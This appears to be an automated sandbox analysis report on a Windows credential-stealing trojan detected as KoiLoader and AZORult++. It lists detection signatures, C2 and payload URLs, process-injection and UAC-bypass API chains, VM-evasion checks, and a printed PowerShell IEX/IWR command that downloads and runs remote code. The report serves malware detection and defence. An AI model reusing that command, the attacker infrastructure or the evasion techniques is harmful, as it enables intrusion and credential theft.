Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
Analysis ID:1674076
MD5:1452d6a3ec8d69b0b331bc751e9c117b
SHA1:9bf39e1ff35659600fc2220e322f0319f5d8add0
SHA256:eed8806090ae11e888fceb18bb633068a6cab9aeac590c10fb2d4b74e0251d84
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

AZORult++, KoiLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected AZORult++ Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cleanup
{
  "C2": "http://79.124.78.173/incongruousness.php",
  "Payload url": "https://www.wilkinsonbeane.com/css/slider"
}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
    00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
        00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560JoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
              0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpackJoeSecurity_KoiLoader_1Yara detected KoiLoaderJoe Security
                  0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1830:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x9bf6:$s1: CoGetObject
                    Click to see the 3 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeAvira: detected
                    Source: http://79.124.78.173/incongruousness.phpAvira URL Cloud: Label: malware
                    Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: KoiLoader {"C2": "http://79.124.78.173/incongruousness.php", "Payload url": "https://www.wilkinsonbeane.com/css/slider"}
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeVirustotal: Detection: 80%Perma Link
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeReversingLabs: Detection: 80%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD86E6 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_00BD86E6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD93A0 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00BD93A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD8710 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_00BD8710

                    Exploits

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD72E0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,lstrlenW,ExpandEnvironmentStringsW,GetSystemWow64DirectoryW,GetLastError,wnsprintfW,wnsprintfW,ExpandEnvironmentStringsW,wnsprintfW,SetFileAttributesW,lstrcpyW,GetUserNameW,NetUserGetInfo,NetApiBufferFree,CoInitializeEx,lstrlenW,wsprintfW,CoGetObject,CoUninitialize,0_2_00BD72E0
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D19A4A FindFirstFileExW,0_2_00D19A4A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_00BD89F0

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://79.124.78.173/incongruousness.php
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD6830 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00BD6830
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeString found in binary or memory: http://79.124.78.173/incongruousness.php
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://79.124.78.173/incongruousness.php%temp%
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeString found in binary or memory: https://www.wilkinsonbeane.com/css/slider
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wilkinsonbeane.com/css/slider/c

                    E-Banking Fraud

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD9240 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_00BD9240

                    System Summary

                    barindex
                    Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD5C70 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00BD5C70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD5FD0 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_00BD5FD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D151850_2_00D15185
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D1FD810_2_00D1FD81
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD7C300_2_00BD7C30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD26B00_2_00BD26B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD43D00_2_00BD43D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD47D00_2_00BD47D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD77100_2_00BD7710
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: String function: 00D13D10 appears 82 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: String function: 00D15140 appears 33 times
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.bank.troj.expl.evad.winEXE@1/0@0/0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD6370 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00BD6370
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD6C60 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_00BD6C60
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeVirustotal: Detection: 80%
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeReversingLabs: Detection: 80%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeSection loaded: uxtheme.dllJump to behavior
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.bd0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe.57ca30.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe PID: 7560, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D11300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00D11300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D20491 push ecx; ret 0_2_00D204A4

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_00BD89F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_00BD89F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-13108
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeAPI coverage: 9.7 %
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D19A4A FindFirstFileExW,0_2_00D19A4A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_00BD89F0
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeBinary or memory string: Hyper-V
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|ri9ux5TIStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.173/incongruousness.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.wilkinsonbeane.com/css/slider/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeBinary or memory string: VMWare
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
                    Source: SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeAPI call chain: ExitProcess graph end nodegraph_0-13111
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeAPI call chain: ExitProcess graph end nodegraph_0-11663
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D1788B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D1788B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D11300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_00D11300
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D11710 mov edx, dword ptr fs:[00000030h]0_2_00D11710
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD7920 mov eax, dword ptr fs:[00000030h]0_2_00BD7920
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD5FD0 mov eax, dword ptr fs:[00000030h]0_2_00BD5FD0
